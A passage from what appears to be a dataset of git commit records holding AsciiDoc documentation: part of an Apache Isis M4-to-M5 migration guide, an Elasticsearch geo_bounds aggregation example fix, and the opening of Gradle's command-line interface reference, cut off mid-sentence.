service.\n * <p>\n * The service's actions do not appear on any viewer and are not visible in the REST API. In other words\n * these are not contributed to the domain-model. However, the service is injectable into domain objects.\n * <\/p>\n *\n * @deprecated will be removed with 2.0.0 release! use Spring's {@link org.springframework.stereotype.Service @Service} instead;\n * @apiNote For now, used as synonym for {@link #REST}\n *\/\n@Deprecated\nDOMAIN,\n\n\/**\n * @deprecated will be removed with 2.0.0 release! use {@link #REST} instead;\n * @apiNote For now, used as synonym for {@link #REST}\n *\/\n@Deprecated\nVIEW_REST_ONLY,\n\n\/**\n * @deprecated will be removed with 2.0.0 release! use {@link #VIEW} instead\n * @apiNote For now, used as synonym for {@link #VIEW}\n *\/\n@Deprecated\nVIEW_MENU_ONLY,\n\n\/**\n * @deprecated will be removed with 2.0.0 release!\n * <p>\n * For now, contributing actions will be gathered to show up in the 'others' menu to ease migration.\n * These will likely not work.\n * <p>\n * Migration Note: For each {@code Action} write a new mixin class.\n * see {@link Mixin}\n * @apiNote For now, used as synonym for {@link #VIEW}\n *\/\n@Deprecated\nVIEW_CONTRIBUTIONS_ONLY,\n----\n\n== Changes to the Configuration\n\n[cols=\"2a,3a\", options=\"header\"]\n.as mapped to IsisConfiguration\n|===\n\n| was\n| new\n\n| isis.persistence.jdo-datanucleus.impl\n| removed, instead configure datasources the Spring way (eg. by providing a DataSource factory) or properties like:\n[source]\n----\nspring.datasource.platform=h2\nspring.datasource.url=jdbc:h2:mem:...\n----\nconfigure Datanucleus settings using\n[source]\n----\ndatanucleus. ...\njavax.jdo. ...\n----\n\n| isis.core.runtimeservices.exception-recognizer.jdo\n| isis.core.runtimeservices.exception-recognizer.dae\n\n|===\n\nFramework functionality was removed to inspect the JDO meta-model for any schemas, such that these would be auto-created. This responsibility is now delegated to Spring.\nHowever, as a fallback we introduced configuration options, that allow explicit schema creation by the framework, for both JDO and JPA: \n\n[source,yaml]\n.application.yml\n----\nisis:\n persistence:\n schema:\n auto-create-schemas: hello\n create-schema-sql-template: \"CREATE SCHEMA IF NOT EXISTS %S\"\n----\n\nMore details, on the various configuration options can be found with _Javadoc_ on _IsisConfiguration_.\n\n== Changes to the Programming Model\n\n=== Removed (Programming Model)\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| was\n| now what?\n\n| `@ActionLayout(contributed=...)`\n| was only effective on mixin methods; use `@Action`, `@Property` or `@Collection` instead\n\n| `@Action\/@Property(command=...)`\n| replaced with `commandPublishing`\n\n| `@Action\/@Property(publish=...)`\n| replaced with `executionPublishing`\n\n| `@DomainObject(audit=...)`\n| replaced with `entityChangePublishing`\n\n| `@DomainObject(nature=...)`\n\n* `EXTERNAL_ENTITY`\n* `INMEMORY_ENTITY`\n| use `@DomainObject(nature=VIEW_MODEL)` instead\n\n| `@DomainObject(nature=...)`\n\n* `JDO_ENTITY`\n* `JPA_ENTITY`\n| use `@DomainObject(nature=ENTITY)` instead\n\n| `@DomainObject(publish=...)`\n| replaced with `entityChangePublishing`\n\n| `@DomainService(repositoryFor=...)`\n| if this domain service acts as a repository for an entity type,\nspecify that entity type (was never implemented)\n\n| `@Mixin`\n| use `@Action`, `@Property` or `@Collection` instead;\n\nfor more fine grained control (eg. setting the mixin's method name)\nuse `@DomainObject(nature=MIXIN, ...)` combined with one of the above\n\n| `@ViewModel`\n| use `@DomainObject(nature=VIEW_MODEL)` instead\n\n| `@ViewModelLayout`\n| use `@DomainObjectLayout` instead\n\n|===\n\n\n=== Added (Programming Model)\n\n.Command\/Execution Publishing (Member Level Annotations)\n[source,java]\n----\n@Action\/@Property(commandPublishing=ENABLED\/DISABLED) \/\/ <.>\n@Action\/@Property(executionPublishing=ENABLED\/DISABLED) \/\/ <.>\n----\n<.> affects Command publishing\n<.> affects Execution publishing\n\n.Entity Change Publishing (Class Level Annotations)\n[source,java]\n----\n@DomainObject(entityChangePublishing=ENABLED\/DISABLED) \/\/ <.>\n----\n<.> affects EntityChange publishing (effective only for entity types)\n\n=== Renamed (Programming Model)\n\n.Publishing API\/SPI\n[source,java]\n----\nAuditerService -> EntityPropertyChangeSubscriber \/\/ <.>\nPublisherService -> ExecutionSubscriber & EntityChangesSubscriber \/\/ <.>\nCommandServiceListener -> CommandSubscriber\n\nPublishedObjects -> ChangingEntities\n----\n<.> `EntityPropertyChangeSubscriber` receives pre-post property values for each changed entity\n<.> `EntityChangesSubscriber` receives the entire set of changed entities, serializable as `ChangesDto`\n\n\n.Loggers - each to be activated by enabling debug logging for the corresponding Logger class\n[source,java]\n----\nAuditerServiceLogging -> EntityPropertyChangeLogger\nPublisherServiceLogging -> ExecutionLogger & EntityChangesLogger\nCommandLogger (NEW)\n----\n\n.Internal Services\n[source,java]\n----\nAuditerDispatchService -> EntityPropertyChangePublisher\nPublisherDispatchService -> ExecutionPublisher & EntityChangesPublisher\nPublisherDispatchServiceDefault -> ExecutionPublisherDefault & EntityChangesPublisherDefault\nCommandServiceInternal -> CommandPublisher\n----\n\n== Changes to Applib and Services\n\n* Interaction related classes have been moved to module `core\/interaction`.\n* Transaction related classes have been moved to module `core\/transaction`.\n* JDO classes have been split up into several modules under `persistence\/jdo\/`.\n* Multiple `Exception` classes have been relocated at `org.apache.isis.applib.exceptions`\n\n[cols=\"3m,3m\", options=\"header\"]\n\n|===\n\n| was\n| new\n\n| ApplicationException (removed)\n| removed, adds no new semantics compared to the already existing RecoverableException\n\n| AuthenticationSession\n| Authentication (no longer holds MessageBroker or session attributes, is now immutable)\n\n| AuthenticationSessionStrategy\n| AuthenticationStrategy\n\n| AuthenticationSessionStrategyBasicAuth.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyBasicAuth\n\n| AuthenticationSessionStrategyDefault.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyDefault\n\n| AuthenticationSessionTracker#getInteraction : Interaction\n| AuthenticationContext#currentInteraction : *Optional*<Interaction>\n\n| Clock (moved from applib module to fixture-applib module)\n| VirtualClock (introduced)\n\n| FatalException (removed)\n| removed, adds no new semantics compared to the already existing UnrecoverableException\n\n| HoldsUpdatedBy, HoldsUpdatedAt, Timestampable\n| moved to 'commons' and renamed:\n HasUpdatedBy,\n HasUpdatedAt,\n HasUpdatedByAndAt\n\n| IsisInteractionFactory\n| InteractionFactory\n\n| IsisModuleJdoDataNucleus5\n| removed, use IsisModuleJdoDatanucleus instead (symmetry with JPA\/IsisModuleJpaEclipselink)\n\n| IsisJdoSupport, IsisJdoSupport_v3_2\n| removed, use JdoSupportService instead (symmetry with JPA\/JpaSupportService)\n\n| InteractionClosure\n| AuthenticationLayer\n\n| IsisApplicationException\n| ApplicationException\n\n| IsisException (removed)\n| use one of 2 hierarchies (in support of i18n translation)\n\n- RecoverableException\n\n- UnrecoverableException\n\n| IsisInteractionTracker\n| InteractionTracker\n\n| MessageBroker is held by Authentication(Session)\n| MessageBroker is held by InteractionSession\n\n| NonRecoverableException\n| renamed to UnrecoverableException\n\n| ParentedOid, PojoRecreationException, PojoRefreshException\n| removed, as no longer used\n\n| QueryDefault (removed)\n|\n[line-through]#new QueryDefault<>(CommandJdo.class, \"findByParent\",\n \"parent\", parent));#\n\nQuery.named(CommandJdo.class, \"findByParent\") +\n .withParameter(\"parent\", parent));\n\n| SudoService\n| redefined, see java doc for details\n\n| TestClock (removed)\n| use factories of VirtualClock.frozenTestClock() instead\n\n| Transaction (removed)\n| no replacement (use TransactionService to get current tx id)\n\n| TransactionScopeListener (removed)\n| use Spring's TransactionSynchronization instead\n\n| TransactionService\n| improved API provides more fine grained control\n\n| UserService#getUser() : UserMemento\n| UserService#currentUser() : *Optional*<UserMemento>\n\n|===\n\n\n== Deprecations\n\n.RepositoryService\n[source,java]\n----\n<T> T detachedEntity(Class<T> ofType); \/\/ <.>\n----\n<.> if applicable use `<T> T detachedEntity(T entity)` instead ... \"new is the new new\", passing\nin a new-ed up (entity) instance is more flexible and also more error prone, eg. it allows the compiler to check\nvalidity of the used constructor rather than doing construction reflective at runtime\n\n== Extensions\n\nObject type namespaces have been renamed.\n\nWARNING: check menubars.layout.xml for any occurrences\n\n[cols=\"3m,3m\", options=\"header\"]\n|===\n\n| Old\n| New\n\n| isisApplib\n| isis.applib\n\n| isisMetaModel\n| isis.metamodel\n\n| isisSecurityApi\n| isis.security\n\n| isissecurity\n| isis.ext.secman\n\n| isisExt*\n| isis.ext.*\n\n| isisSub*\n| isis.sub.*\n\n|===\n\n\n=== SecMan (Extension)\n\nPermission are now matched against logical packages, logical object types or logical object member names and use the former fully qualified names only as fallback.\n\n[cols=\"3m,3m,3a\", options=\"header\"]\n|===\n\n| What\n| Old\n| New\n\n| Domain Object namespaces in SecMan scope like eg. objectType = \"isissecurity.ApplicationUser\"\n| isissecurity\n| isis.ext.secman\n\nWARNING: check menubars.layout.xml for any occurrences\n\n| Default Regular User Role Name\n| isis-module-security-regular-user\n| secman-regular-user\n\n| Default Fixture Role Name\n| isis-module-security-fixtures\n| secman-fixtures\n\n| Default Admin Role Name\n| isis-module-security-admin\n| secman-admin\n\n| Default Admin User Name\n| isis-module-security-admin\n| secman-admin\n\n| Class\n| SecurityModuleConfig\n| SecmanConfiguration\n\n| Option\n| SecurityModuleConfig#adminAdditionalPackagePermission\n| SecmanConfiguration#adminAdditionalNamespacePermission\n\n\n\n|===\n\n","old_contents":"= Migrating from M4 to M5\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\nWARNING: Not released yet.\n\n== Removal of Image Value Type\n\nSome Java classes and\/or packages have been renamed\/moved:\n\n[source,java]\n.Applib\n----\n\/\/ org.apache.isis.applib.value.Image\norg.apache.isis.legacy.applib.value.Image \/\/ <.>\n----\n<.> only kept to ease migration, use `java.awt.image.BufferedImage` instead, which is supported by the framework as value type\n\n\n== Removal of deprecated Contributees\n\n.Config\n[source,java]\n----\nisis.core.metaModel.validator.serviceActionsOnly=true \/\/ <.>\nisis.core.metaModel.validator.mixins-only=true \/\/ <.>\n----\n<.> `@DomainService(natureOfService=VIEW\/REST)` is now solely used for UI menu action providers and REST end-points.\nThere is no longer the need to validate uses of `natureOfService=DOMAIN` as this option was removed.\n<.> Support for services that contribute members to other `DomainObjects` was removed. Use `Mixins` instead.\n\nSee the former java-doc for hints on how to migrate the previous options.\n\n.@DomainService(natureOfService=...)\n[source,java]\n----\n\/**\n * A <em>programmatic<\/em> service.\n * <p>\n * The service's actions do not appear on any viewer and are not visible in the REST API. In other words\n * these are not contributed to the domain-model. However, the service is injectable into domain objects.\n * <\/p>\n *\n * @deprecated will be removed with 2.0.0 release! use Spring's {@link org.springframework.stereotype.Service @Service} instead;\n * @apiNote For now, used as synonym for {@link #REST}\n *\/\n@Deprecated\nDOMAIN,\n\n\/**\n * @deprecated will be removed with 2.0.0 release! use {@link #REST} instead;\n * @apiNote For now, used as synonym for {@link #REST}\n *\/\n@Deprecated\nVIEW_REST_ONLY,\n\n\/**\n * @deprecated will be removed with 2.0.0 release! use {@link #VIEW} instead\n * @apiNote For now, used as synonym for {@link #VIEW}\n *\/\n@Deprecated\nVIEW_MENU_ONLY,\n\n\/**\n * @deprecated will be removed with 2.0.0 release!\n * <p>\n * For now, contributing actions will be gathered to show up in the 'others' menu to ease migration.\n * These will likely not work.\n * <p>\n * Migration Note: For each {@code Action} write a new mixin class.\n * see {@link Mixin}\n * @apiNote For now, used as synonym for {@link #VIEW}\n *\/\n@Deprecated\nVIEW_CONTRIBUTIONS_ONLY,\n----\n\n== Changes to the Configuration\n\n[cols=\"2a,3a\", options=\"header\"]\n.as mapped to IsisConfiguration\n|===\n\n| was\n| new\n\n| isis.persistence.jdo-datanucleus.impl\n| removed, instead configure datasources the Spring way (eg. by providing a DataSource factory) or properties like:\n[source]\n----\nspring.datasource.platform=h2\nspring.datasource.url=jdbc:h2:mem:...\n----\nconfigure Datanucleus settings using\n[source]\n----\ndatanucleus. ...\njavax.jdo. ...\n----\n\n| isis.core.runtimeservices.exception-recognizer.jdo\n| isis.core.runtimeservices.exception-recognizer.dae\n\n|===\n\n== Changes to the Programming Model\n\n=== Removed (Programming Model)\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| was\n| now what?\n\n| `@ActionLayout(contributed=...)`\n| was only effective on mixin methods; use `@Action`, `@Property` or `@Collection` instead\n\n| `@Action\/@Property(command=...)`\n| replaced with `commandPublishing`\n\n| `@Action\/@Property(publish=...)`\n| replaced with `executionPublishing`\n\n| `@DomainObject(audit=...)`\n| replaced with `entityChangePublishing`\n\n| `@DomainObject(nature=...)`\n\n* `EXTERNAL_ENTITY`\n* `INMEMORY_ENTITY`\n| use `@DomainObject(nature=VIEW_MODEL)` instead\n\n| `@DomainObject(nature=...)`\n\n* `JDO_ENTITY`\n* `JPA_ENTITY`\n| use `@DomainObject(nature=ENTITY)` instead\n\n| `@DomainObject(publish=...)`\n| replaced with `entityChangePublishing`\n\n| `@DomainService(repositoryFor=...)`\n| if this domain service acts as a repository for an entity type,\nspecify that entity type (was never implemented)\n\n| `@Mixin`\n| use `@Action`, `@Property` or `@Collection` instead;\n\nfor more fine grained control (eg. setting the mixin's method name)\nuse `@DomainObject(nature=MIXIN, ...)` combined with one of the above\n\n| `@ViewModel`\n| use `@DomainObject(nature=VIEW_MODEL)` instead\n\n| `@ViewModelLayout`\n| use `@DomainObjectLayout` instead\n\n|===\n\n\n=== Added (Programming Model)\n\n.Command\/Execution Publishing (Member Level Annotations)\n[source,java]\n----\n@Action\/@Property(commandPublishing=ENABLED\/DISABLED) \/\/ <.>\n@Action\/@Property(executionPublishing=ENABLED\/DISABLED) \/\/ <.>\n----\n<.> affects Command publishing\n<.> affects Execution publishing\n\n.Entity Change Publishing (Class Level Annotations)\n[source,java]\n----\n@DomainObject(entityChangePublishing=ENABLED\/DISABLED) \/\/ <.>\n----\n<.> affects EntityChange publishing (effective only for entity types)\n\n=== Renamed (Programming Model)\n\n.Publishing API\/SPI\n[source,java]\n----\nAuditerService -> EntityPropertyChangeSubscriber \/\/ <.>\nPublisherService -> ExecutionSubscriber & EntityChangesSubscriber \/\/ <.>\nCommandServiceListener -> CommandSubscriber\n\nPublishedObjects -> ChangingEntities\n----\n<.> `EntityPropertyChangeSubscriber` receives pre-post property values for each changed entity\n<.> `EntityChangesSubscriber` receives the entire set of changed entities, serializable as `ChangesDto`\n\n\n.Loggers - each to be activated by enabling debug logging for the corresponding Logger class\n[source,java]\n----\nAuditerServiceLogging -> EntityPropertyChangeLogger\nPublisherServiceLogging -> ExecutionLogger & EntityChangesLogger\nCommandLogger (NEW)\n----\n\n.Internal Services\n[source,java]\n----\nAuditerDispatchService -> EntityPropertyChangePublisher\nPublisherDispatchService -> ExecutionPublisher & EntityChangesPublisher\nPublisherDispatchServiceDefault -> ExecutionPublisherDefault & EntityChangesPublisherDefault\nCommandServiceInternal -> CommandPublisher\n----\n\n== Changes to Applib and Services\n\n* Interaction related classes have been moved to module `core\/interaction`.\n* Transaction related classes have been moved to module `core\/transaction`.\n* JDO classes have been split up into several modules under `persistence\/jdo\/`.\n* Multiple `Exception` classes have been relocated at `org.apache.isis.applib.exceptions`\n\n[cols=\"3m,3m\", options=\"header\"]\n\n|===\n\n| was\n| new\n\n| ApplicationException (removed)\n| removed, adds no new semantics compared to the already existing RecoverableException\n\n| AuthenticationSession\n| Authentication (no longer holds MessageBroker or session attributes, is now immutable)\n\n| AuthenticationSessionStrategy\n| AuthenticationStrategy\n\n| AuthenticationSessionStrategyBasicAuth.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyBasicAuth\n\n| AuthenticationSessionStrategyDefault.footnote:[These might be in use with configuration files, check yours!]\n| AuthenticationStrategyDefault\n\n| AuthenticationSessionTracker#getInteraction : Interaction\n| AuthenticationContext#currentInteraction : *Optional*<Interaction>\n\n| Clock (moved from applib module to fixture-applib module)\n| VirtualClock (introduced)\n\n| FatalException (removed)\n| removed, adds no new semantics compared to the already existing UnrecoverableException\n\n| HoldsUpdatedBy, HoldsUpdatedAt, Timestampable\n| moved to 'commons' and renamed:\n HasUpdatedBy,\n HasUpdatedAt,\n HasUpdatedByAndAt\n\n| IsisInteractionFactory\n| InteractionFactory\n\n| IsisModuleJdoDataNucleus5\n| removed, use IsisModuleJdoDatanucleus instead (symmetry with JPA\/IsisModuleJpaEclipselink)\n\n| IsisJdoSupport, IsisJdoSupport_v3_2\n| removed, use JdoSupportService instead (symmetry with JPA\/JpaSupportService)\n\n| InteractionClosure\n| AuthenticationLayer\n\n| IsisApplicationException\n| ApplicationException\n\n| IsisException (removed)\n| use one of 2 hierarchies (in support of i18n translation)\n\n- RecoverableException\n\n- UnrecoverableException\n\n| IsisInteractionTracker\n| InteractionTracker\n\n| MessageBroker is held by Authentication(Session)\n| MessageBroker is held by InteractionSession\n\n| NonRecoverableException\n| renamed to UnrecoverableException\n\n| ParentedOid, PojoRecreationException, PojoRefreshException\n| removed, as no longer used\n\n| QueryDefault (removed)\n|\n[line-through]#new QueryDefault<>(CommandJdo.class, \"findByParent\",\n \"parent\", parent));#\n\nQuery.named(CommandJdo.class, \"findByParent\") +\n .withParameter(\"parent\", parent));\n\n| SudoService\n| redefined, see java doc for details\n\n| TestClock (removed)\n| use factories of VirtualClock.frozenTestClock() instead\n\n| Transaction (removed)\n| no replacement (use TransactionService to get current tx id)\n\n| TransactionScopeListener (removed)\n| use Spring's TransactionSynchronization instead\n\n| TransactionService\n| improved API provides more fine grained control\n\n| UserService#getUser() : UserMemento\n| UserService#currentUser() : *Optional*<UserMemento>\n\n|===\n\n\n== Deprecations\n\n.RepositoryService\n[source,java]\n----\n<T> T detachedEntity(Class<T> ofType); \/\/ <.>\n----\n<.> if applicable use `<T> T detachedEntity(T entity)` instead ... \"new is the new new\", passing\nin a new-ed up (entity) instance is more flexible and also more error prone, eg. it allows the compiler to check\nvalidity of the used constructor rather than doing construction reflective at runtime\n\n== Extensions\n\nObject type namespaces have been renamed.\n\nWARNING: check menubars.layout.xml for any occurrences\n\n[cols=\"3m,3m\", options=\"header\"]\n|===\n\n| Old\n| New\n\n| isisApplib\n| isis.applib\n\n| isisMetaModel\n| isis.metamodel\n\n| isisSecurityApi\n| isis.security\n\n| isissecurity\n| isis.ext.secman\n\n| isisExt*\n| isis.ext.*\n\n| isisSub*\n| isis.sub.*\n\n|===\n\n\n=== SecMan (Extension)\n\nPermission are now matched against logical packages, logical object types or logical object member names and use the former fully qualified names only as fallback.\n\n[cols=\"3m,3m,3a\", options=\"header\"]\n|===\n\n| What\n| Old\n| New\n\n| Domain Object namespaces in SecMan scope like eg. objectType = \"isissecurity.ApplicationUser\"\n| isissecurity\n| isis.ext.secman\n\nWARNING: check menubars.layout.xml for any occurrences\n\n| Default Regular User Role Name\n| isis-module-security-regular-user\n| secman-regular-user\n\n| Default Fixture Role Name\n| isis-module-security-fixtures\n| secman-fixtures\n\n| Default Admin Role Name\n| isis-module-security-admin\n| secman-admin\n\n| Default Admin User Name\n| isis-module-security-admin\n| secman-admin\n\n| Class\n| SecurityModuleConfig\n| SecmanConfiguration\n\n| Option\n| SecurityModuleConfig#adminAdditionalPackagePermission\n| SecmanConfiguration#adminAdditionalNamespacePermission\n\n\n\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ebf39fb4e8639d1e488872978056fa5cc18fbf7","subject":"Docs: Fix missing comma and boolean true","message":"Docs: Fix missing comma and boolean true\n\nCloses #9350\n","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : {\n \"geo_bounds\" : {\n \"field\" : \"location\", <1>\n \"wrap_longitude\" : true <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","old_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : {\n \"geo_bounds\" : {\n \"field\" : \"location\" <1>\n \"wrap_longitude\" : \"true\" <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"603f1b46bfdf6855a14cec0672a0831a1e2eb3cb","subject":"Fix docs link","message":"Fix docs link\n","repos":"gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can run a task and all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,dependencies>>.\n----\n$ gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\n\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n$ gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:name_abbreviation]]\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` 